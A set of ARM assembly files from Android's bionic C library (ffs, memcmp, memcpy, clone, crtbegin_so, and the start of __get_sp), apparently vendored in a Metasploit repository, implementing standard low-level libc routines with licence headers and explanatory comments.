OpenWireSec/metasploit | 3,222 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/ffs.S | /* $NetBSD: ffs.S,v 1.5 2003/04/05 23:08:52 bjh21 Exp $ */
/*
* Copyright (c) 2001 Christopher Gilbert
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the company nor the name of the author may be used to
* endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* ffs - find first set bit, this algorithm isolates the first set
* bit, then multiplies the number by 0x0450fbaf which leaves the top
* 6 bits as an index into the table. This algorithm should be a win
* over the checking each bit in turn as per the C compiled version.
*
* under ARMv5 there's an instruction called CLZ (count leading Zero's) that
* could be used
*
* This is the ffs algorithm devised by d.seal and posted to comp.sys.arm on
* 16 Feb 1994.
*/
ENTRY(ffs)
/* Standard trick to isolate bottom bit in r0 or 0 if r0 = 0 on entry */
rsb r1, r0, #0
ands r0, r0, r1
#ifndef __ARM_ARCH_5__
/*
* now r0 has at most one set bit, call this X
* if X = 0, all further instructions are skipped
*/
adrne r2, .L_ffs_table
orrne r0, r0, r0, lsl #4 /* r0 = X * 0x11 */
orrne r0, r0, r0, lsl #6 /* r0 = X * 0x451 */
rsbne r0, r0, r0, lsl #16 /* r0 = X * 0x0450fbaf */
/* now lookup in table indexed on top 6 bits of r0 */
ldrneb r0, [ r2, r0, lsr #26 ]
bx lr
.text;
.type .L_ffs_table, _ASM_TYPE_OBJECT;
.L_ffs_table:
/* 0 1 2 3 4 5 6 7 */
.byte 0, 1, 2, 13, 3, 7, 0, 14 /* 0- 7 */
.byte 4, 0, 8, 0, 0, 0, 0, 15 /* 8-15 */
.byte 11, 5, 0, 0, 9, 0, 0, 26 /* 16-23 */
.byte 0, 0, 0, 0, 0, 22, 28, 16 /* 24-31 */
.byte 32, 12, 6, 0, 0, 0, 0, 0 /* 32-39 */
.byte 10, 0, 0, 25, 0, 0, 21, 27 /* 40-47 */
.byte 31, 0, 0, 0, 0, 24, 0, 20 /* 48-55 */
.byte 30, 0, 23, 19, 29, 18, 17, 0 /* 56-63 */
#else
clzne r0, r0
rsbne r0, r0, #32
bx lr
#endif
|
OpenWireSec/metasploit | 8,578 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcmp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
.text
.global memcmp
.type memcmp, %function
.align 4
/*
* Optimized memcmp() for ARM9.
* This would not be optimal on XScale or ARM11, where more prefetching
* and use of PLD will be needed.
* The 2 major optimzations here are
* (1) The main loop compares 16 bytes at a time
* (2) The loads are scheduled in a way they won't stall
*/
memcmp:
.fnstart
PLD (r0, #0)
PLD (r1, #0)
/* take of the case where length is 0 or the buffers are the same */
cmp r0, r1
cmpne r2, #0
moveq r0, #0
bxeq lr
.save {r4, lr}
/* save registers */
stmfd sp!, {r4, lr}
PLD (r0, #32)
PLD (r1, #32)
/* since r0 hold the result, move the first source
* pointer somewhere else
*/
mov r4, r0
/* make sure we have at least 8+4 bytes, this simplify things below
* and avoid some overhead for small blocks
*/
cmp r2, #(8+4)
bmi 8f
/* align first pointer to word boundary
* offset = -src & 3
*/
rsb r3, r4, #0
ands r3, r3, #3
beq 0f
/* align first pointer */
sub r2, r2, r3
1: ldrb r0, [r4], #1
ldrb ip, [r1], #1
subs r0, r0, ip
bne 9f
subs r3, r3, #1
bne 1b
0: /* here the first pointer is aligned, and we have at least 4 bytes
* to process.
*/
/* see if the pointers are congruent */
eor r0, r4, r1
ands r0, r0, #3
bne 5f
/* congruent case, 32 bytes per iteration
* We need to make sure there are at least 32+4 bytes left
* because we effectively read ahead one word, and we could
* read past the buffer (and segfault) if we're not careful.
*/
ldr ip, [r1]
subs r2, r2, #(32 + 4)
bmi 1f
0: PLD (r4, #64)
PLD (r1, #64)
ldr r0, [r4], #4
ldr lr, [r1, #4]!
eors r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r4], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r4], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
bne 2f
subs r2, r2, #32
bhs 0b
/* do we have at least 4 bytes left? */
1: adds r2, r2, #(32 - 4 + 4)
bmi 4f
/* finish off 4 bytes at a time */
3: ldr r0, [r4], #4
ldr ip, [r1], #4
eors r0, r0, ip
bne 2f
subs r2, r2, #4
bhs 3b
/* are we done? */
4: adds r2, r2, #4
moveq r0, #0
beq 9f
/* finish off the remaining bytes */
b 8f
2: /* the last 4 bytes are different, restart them */
sub r4, r4, #4
sub r1, r1, #4
mov r2, #4
/* process the last few bytes */
8: ldrb r0, [r4], #1
ldrb ip, [r1], #1
// stall
subs r0, r0, ip
bne 9f
subs r2, r2, #1
bne 8b
9: /* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
.fnend
5: /*************** non-congruent case ***************/
and r0, r1, #3
cmp r0, #2
bne 4f
/* here, offset is 2 (16-bits aligned, special cased) */
/* make sure we have at least 16 bytes to process */
subs r2, r2, #16
addmi r2, r2, #16
bmi 8b
/* align the unaligned pointer */
bic r1, r1, #3
ldr lr, [r1], #4
6: PLD (r1, #64)
PLD (r4, #64)
mov ip, lr, lsr #16
ldr lr, [r1], #4
ldr r0, [r4], #4
orr ip, ip, lr, lsl #16
eors r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #16
bhs 6b
sub r1, r1, #2
/* are we done? */
adds r2, r2, #16
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #(4+2)
sub r4, r4, #4
mov r2, #4
b 8b
4: /*************** offset is 1 or 3 (less optimized) ***************/
stmfd sp!, {r5, r6, r7}
// r5 = rhs
// r6 = lhs
// r7 = scratch
mov r5, r0, lsl #3 /* r5 = right shift */
rsb r6, r5, #32 /* r6 = left shift */
/* align the unaligned pointer */
bic r1, r1, #3
ldr r7, [r1], #4
sub r2, r2, #8
6: mov ip, r7, lsr r5
ldr r7, [r1], #4
ldr r0, [r4], #4
orr ip, ip, r7, lsl r6
eors r0, r0, ip
moveq ip, r7, lsr r5
ldreq r7, [r1], #4
ldreq r0, [r4], #4
orreq ip, ip, r7, lsl r6
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #8
bhs 6b
sub r1, r1, r6, lsr #3
ldmfd sp!, {r5, r6, r7}
/* are we done? */
adds r2, r2, #8
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #4
sub r1, r1, r6, lsr #3
sub r4, r4, #4
mov r2, #4
ldmfd sp!, {r5, r6, r7}
b 8b
|
OpenWireSec/metasploit | 15,072 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcpy.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
#if defined(__ARM_NEON__)
.text
.fpu neon
.global memcpy
.type memcpy, %function
.align 4
/* a prefetch distance of 4 cache-lines works best experimentally */
#define CACHE_LINE_SIZE 64
#define PREFETCH_DISTANCE (CACHE_LINE_SIZE*4)
memcpy:
.fnstart
.save {r0, lr}
stmfd sp!, {r0, lr}
/* start preloading as early as possible */
pld [r1, #(CACHE_LINE_SIZE*0)]
pld [r1, #(CACHE_LINE_SIZE*1)]
/* do we have at least 16-bytes to copy (needed for alignment below) */
cmp r2, #16
blo 5f
/* align destination to half cache-line for the write-buffer */
rsb r3, r0, #0
ands r3, r3, #0xF
beq 0f
/* copy up to 15-bytes (count in r3) */
sub r2, r2, r3
movs ip, r3, lsl #31
ldrmib lr, [r1], #1
strmib lr, [r0], #1
ldrcsb ip, [r1], #1
ldrcsb lr, [r1], #1
strcsb ip, [r0], #1
strcsb lr, [r0], #1
movs ip, r3, lsl #29
bge 1f
// copies 4 bytes, destination 32-bits aligned
vld4.8 {d0[0], d1[0], d2[0], d3[0]}, [r1]!
vst4.8 {d0[0], d1[0], d2[0], d3[0]}, [r0, :32]!
1: bcc 2f
// copies 8 bytes, destination 64-bits aligned
vld1.8 {d0}, [r1]!
vst1.8 {d0}, [r0, :64]!
2:
0: /* preload immediately the next cache line, which we may need */
pld [r1, #(CACHE_LINE_SIZE*0)]
pld [r1, #(CACHE_LINE_SIZE*1)]
/* make sure we have at least 64 bytes to copy */
subs r2, r2, #64
blo 2f
/* preload all the cache lines we need.
* NOTE: the number of pld below depends on PREFETCH_DISTANCE,
* ideally would would increase the distance in the main loop to
* avoid the goofy code below. In practice this doesn't seem to make
* a big difference.
*/
pld [r1, #(CACHE_LINE_SIZE*2)]
pld [r1, #(CACHE_LINE_SIZE*3)]
pld [r1, #(PREFETCH_DISTANCE)]
1: /* The main loop copies 64 bytes at a time */
vld1.8 {d0 - d3}, [r1]!
vld1.8 {d4 - d7}, [r1]!
pld [r1, #(PREFETCH_DISTANCE)]
subs r2, r2, #64
vst1.8 {d0 - d3}, [r0, :128]!
vst1.8 {d4 - d7}, [r0, :128]!
bhs 1b
2: /* fix-up the remaining count and make sure we have >= 32 bytes left */
add r2, r2, #64
subs r2, r2, #32
blo 4f
3: /* 32 bytes at a time. These cache lines were already preloaded */
vld1.8 {d0 - d3}, [r1]!
subs r2, r2, #32
vst1.8 {d0 - d3}, [r0, :128]!
bhs 3b
4: /* less than 32 left */
add r2, r2, #32
tst r2, #0x10
beq 5f
// copies 16 bytes, 128-bits aligned
vld1.8 {d0, d1}, [r1]!
vst1.8 {d0, d1}, [r0, :128]!
5: /* copy up to 15-bytes (count in r2) */
movs ip, r2, lsl #29
bcc 1f
vld1.8 {d0}, [r1]!
vst1.8 {d0}, [r0]!
1: bge 2f
vld4.8 {d0[0], d1[0], d2[0], d3[0]}, [r1]!
vst4.8 {d0[0], d1[0], d2[0], d3[0]}, [r0]!
2: movs ip, r2, lsl #31
ldrmib r3, [r1], #1
ldrcsb ip, [r1], #1
ldrcsb lr, [r1], #1
strmib r3, [r0], #1
strcsb ip, [r0], #1
strcsb lr, [r0], #1
ldmfd sp!, {r0, lr}
bx lr
.fnend
#else /* __ARM_ARCH__ < 7 */
.text
.global memcpy
.type memcpy, %function
.align 4
/*
* Optimized memcpy() for ARM.
*
* note that memcpy() always returns the destination pointer,
* so we have to preserve R0.
*/
memcpy:
/* The stack must always be 64-bits aligned to be compliant with the
* ARM ABI. Since we have to save R0, we might as well save R4
* which we can use for better pipelining of the reads below
*/
.fnstart
.save {r0, r4, lr}
stmfd sp!, {r0, r4, lr}
/* Making room for r5-r11 which will be spilled later */
.pad #28
sub sp, sp, #28
// preload the destination because we'll align it to a cache line
// with small writes. Also start the source "pump".
PLD (r0, #0)
PLD (r1, #0)
PLD (r1, #32)
/* it simplifies things to take care of len<4 early */
cmp r2, #4
blo copy_last_3_and_return
/* compute the offset to align the source
* offset = (4-(src&3))&3 = -src & 3
*/
rsb r3, r1, #0
ands r3, r3, #3
beq src_aligned
/* align source to 32 bits. We need to insert 2 instructions between
* a ldr[b|h] and str[b|h] because byte and half-word instructions
* stall 2 cycles.
*/
movs r12, r3, lsl #31
sub r2, r2, r3 /* we know that r3 <= r2 because r2 >= 4 */
ldrmib r3, [r1], #1
ldrcsb r4, [r1], #1
ldrcsb r12,[r1], #1
strmib r3, [r0], #1
strcsb r4, [r0], #1
strcsb r12,[r0], #1
src_aligned:
/* see if src and dst are aligned together (congruent) */
eor r12, r0, r1
tst r12, #3
bne non_congruent
/* Use post-incriment mode for stm to spill r5-r11 to reserved stack
* frame. Don't update sp.
*/
stmea sp, {r5-r11}
/* align the destination to a cache-line */
rsb r3, r0, #0
ands r3, r3, #0x1C
beq congruent_aligned32
cmp r3, r2
andhi r3, r2, #0x1C
/* conditionnaly copies 0 to 7 words (length in r3) */
movs r12, r3, lsl #28
ldmcsia r1!, {r4, r5, r6, r7} /* 16 bytes */
ldmmiia r1!, {r8, r9} /* 8 bytes */
stmcsia r0!, {r4, r5, r6, r7}
stmmiia r0!, {r8, r9}
tst r3, #0x4
ldrne r10,[r1], #4 /* 4 bytes */
strne r10,[r0], #4
sub r2, r2, r3
congruent_aligned32:
/*
* here source is aligned to 32 bytes.
*/
cached_aligned32:
subs r2, r2, #32
blo less_than_32_left
/*
* We preload a cache-line up to 64 bytes ahead. On the 926, this will
* stall only until the requested world is fetched, but the linefill
* continues in the the background.
* While the linefill is going, we write our previous cache-line
* into the write-buffer (which should have some free space).
* When the linefill is done, the writebuffer will
* start dumping its content into memory
*
* While all this is going, we then load a full cache line into
* 8 registers, this cache line should be in the cache by now
* (or partly in the cache).
*
* This code should work well regardless of the source/dest alignment.
*
*/
// Align the preload register to a cache-line because the cpu does
// "critical word first" (the first word requested is loaded first).
bic r12, r1, #0x1F
add r12, r12, #64
1: ldmia r1!, { r4-r11 }
PLD (r12, #64)
subs r2, r2, #32
// NOTE: if r12 is more than 64 ahead of r1, the following ldrhi
// for ARM9 preload will not be safely guarded by the preceding subs.
// When it is safely guarded the only possibility to have SIGSEGV here
// is because the caller overstates the length.
ldrhi r3, [r12], #32 /* cheap ARM9 preload */
stmia r0!, { r4-r11 }
bhs 1b
add r2, r2, #32
less_than_32_left:
/*
* less than 32 bytes left at this point (length in r2)
*/
/* skip all this if there is nothing to do, which should
* be a common case (if not executed the code below takes
* about 16 cycles)
*/
tst r2, #0x1F
beq 1f
/* conditionnaly copies 0 to 31 bytes */
movs r12, r2, lsl #28
ldmcsia r1!, {r4, r5, r6, r7} /* 16 bytes */
ldmmiia r1!, {r8, r9} /* 8 bytes */
stmcsia r0!, {r4, r5, r6, r7}
stmmiia r0!, {r8, r9}
movs r12, r2, lsl #30
ldrcs r3, [r1], #4 /* 4 bytes */
ldrmih r4, [r1], #2 /* 2 bytes */
strcs r3, [r0], #4
strmih r4, [r0], #2
tst r2, #0x1
ldrneb r3, [r1] /* last byte */
strneb r3, [r0]
/* we're done! restore everything and return */
1: ldmfd sp!, {r5-r11}
ldmfd sp!, {r0, r4, lr}
bx lr
/********************************************************************/
non_congruent:
/*
* here source is aligned to 4 bytes
* but destination is not.
*
* in the code below r2 is the number of bytes read
* (the number of bytes written is always smaller, because we have
* partial words in the shift queue)
*/
cmp r2, #4
blo copy_last_3_and_return
/* Use post-incriment mode for stm to spill r5-r11 to reserved stack
* frame. Don't update sp.
*/
stmea sp, {r5-r11}
/* compute shifts needed to align src to dest */
rsb r5, r0, #0
and r5, r5, #3 /* r5 = # bytes in partial words */
mov r12, r5, lsl #3 /* r12 = right */
rsb lr, r12, #32 /* lr = left */
/* read the first word */
ldr r3, [r1], #4
sub r2, r2, #4
/* write a partial word (0 to 3 bytes), such that destination
* becomes aligned to 32 bits (r5 = nb of words to copy for alignment)
*/
movs r5, r5, lsl #31
strmib r3, [r0], #1
movmi r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
cmp r2, #4
blo partial_word_tail
/* Align destination to 32 bytes (cache line boundary) */
1: tst r0, #0x1c
beq 2f
ldr r5, [r1], #4
sub r2, r2, #4
orr r4, r3, r5, lsl lr
mov r3, r5, lsr r12
str r4, [r0], #4
cmp r2, #4
bhs 1b
blo partial_word_tail
/* copy 32 bytes at a time */
2: subs r2, r2, #32
blo less_than_thirtytwo
/* Use immediate mode for the shifts, because there is an extra cycle
* for register shifts, which could account for up to 50% of
* performance hit.
*/
cmp r12, #24
beq loop24
cmp r12, #8
beq loop8
loop16:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #16
mov r4, r4, lsr #16
orr r4, r4, r5, lsl #16
mov r5, r5, lsr #16
orr r5, r5, r6, lsl #16
mov r6, r6, lsr #16
orr r6, r6, r7, lsl #16
mov r7, r7, lsr #16
orr r7, r7, r8, lsl #16
mov r8, r8, lsr #16
orr r8, r8, r9, lsl #16
mov r9, r9, lsr #16
orr r9, r9, r10, lsl #16
mov r10, r10, lsr #16
orr r10, r10, r11, lsl #16
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #16
bhs 1b
b less_than_thirtytwo
loop8:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #24
mov r4, r4, lsr #8
orr r4, r4, r5, lsl #24
mov r5, r5, lsr #8
orr r5, r5, r6, lsl #24
mov r6, r6, lsr #8
orr r6, r6, r7, lsl #24
mov r7, r7, lsr #8
orr r7, r7, r8, lsl #24
mov r8, r8, lsr #8
orr r8, r8, r9, lsl #24
mov r9, r9, lsr #8
orr r9, r9, r10, lsl #24
mov r10, r10, lsr #8
orr r10, r10, r11, lsl #24
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #8
bhs 1b
b less_than_thirtytwo
loop24:
ldr r12, [r1], #4
1: mov r4, r12
ldmia r1!, { r5,r6,r7, r8,r9,r10,r11}
PLD (r1, #64)
subs r2, r2, #32
ldrhs r12, [r1], #4
orr r3, r3, r4, lsl #8
mov r4, r4, lsr #24
orr r4, r4, r5, lsl #8
mov r5, r5, lsr #24
orr r5, r5, r6, lsl #8
mov r6, r6, lsr #24
orr r6, r6, r7, lsl #8
mov r7, r7, lsr #24
orr r7, r7, r8, lsl #8
mov r8, r8, lsr #24
orr r8, r8, r9, lsl #8
mov r9, r9, lsr #24
orr r9, r9, r10, lsl #8
mov r10, r10, lsr #24
orr r10, r10, r11, lsl #8
stmia r0!, {r3,r4,r5,r6, r7,r8,r9,r10}
mov r3, r11, lsr #24
bhs 1b
less_than_thirtytwo:
/* copy the last 0 to 31 bytes of the source */
rsb r12, lr, #32 /* we corrupted r12, recompute it */
add r2, r2, #32
cmp r2, #4
blo partial_word_tail
1: ldr r5, [r1], #4
sub r2, r2, #4
orr r4, r3, r5, lsl lr
mov r3, r5, lsr r12
str r4, [r0], #4
cmp r2, #4
bhs 1b
partial_word_tail:
/* we have a partial word in the input buffer */
movs r5, lr, lsl #(31-3)
strmib r3, [r0], #1
movmi r3, r3, lsr #8
strcsb r3, [r0], #1
movcs r3, r3, lsr #8
strcsb r3, [r0], #1
/* Refill spilled registers from the stack. Don't update sp. */
ldmfd sp, {r5-r11}
copy_last_3_and_return:
movs r2, r2, lsl #31 /* copy remaining 0, 1, 2 or 3 bytes */
ldrmib r2, [r1], #1
ldrcsb r3, [r1], #1
ldrcsb r12,[r1]
strmib r2, [r0], #1
strcsb r3, [r0], #1
strcsb r12,[r0]
/* we're done! restore sp and spilled registers and return */
add sp, sp, #28
ldmfd sp!, {r0, r4, lr}
bx lr
.fnend
#endif /* __ARM_ARCH__ < 7 */
|
OpenWireSec/metasploit | 3,583 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/clone.S | /*
* Copyright (C) 2008-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type __pthread_clone, #function
.global __pthread_clone
.align 4
.fnstart
__pthread_clone:
@ insert the args onto the new stack
str r0, [r1, #-4]
str r3, [r1, #-8]
@ do the system call
@ get flags
mov r0, r2
@ new sp is already in r1
#if __ARM_EABI__
stmfd sp!, {r4, r7}
ldr r7, =__NR_clone
swi #0
#else
swi #__NR_clone
#endif
movs r0, r0
#if __ARM_EABI__
ldmnefd sp!, {r4, r7}
#endif
blt __error
bxne lr
@ pick the function arg and call address off the stack and jump
@ to the C __thread_entry function which does some setup and then
@ calls the thread's start function
ldr r0, [sp, #-4]
ldr r1, [sp, #-8]
mov r2, sp @ __thread_entry needs the TLS pointer
b __thread_entry
__error:
mov r0, #-1
bx lr
.fnend
#
# This function is defined as:
#
# pid_t __bionic_clone( int flags, void *child_stack,
# pid_t *pid, void *tls, pid_t *ctid,
# int (*fn)(void *), void* arg );
#
# NOTE: This is not the same signature than the GLibc
# __clone function here !! Placing 'fn' and 'arg'
# at the end of the parameter list makes the
# implementation much simpler.
#
.type __bionic_clone, #function
.globl __bionic_clone
.align 4
.fnstart
__bionic_clone:
mov ip, sp
.save {r4, r5, r6, r7}
# save registers to parent stack
stmfd sp!, {r4, r5, r6, r7}
# load extra parameters
ldmfd ip, {r4, r5, r6}
# store 'fn' and 'arg' to the child stack
str r5, [r1, #-4]
str r6, [r1, #-8]
# system call
ldr r7, =__NR_clone
swi #0
movs r0, r0
beq 1f
# in parent, reload saved registers
# then either exit or error
#
ldmfd sp!, {r4, r5, r6, r7}
bxne lr
b __set_syscall_errno
1: # in the child - pick arguments
ldr r0, [sp, #-4]
ldr r1, [sp, #-8]
b __bionic_clone_entry
.fnend
|
OpenWireSec/metasploit | 1,961 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_so.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
# Implement static C++ destructors when the shared
# library is unloaded through dlclose().
#
# A call to this function must be the first entry
# in the .fini_array. See 3.3.5.3.C of C++ ABI
# standard.
#
__on_dlclose:
adr r0, 0f
ldr r0, [r0]
b __cxa_finalize
0:
.long __dso_handle
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.long __on_dlclose
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,472 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/__get_sp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
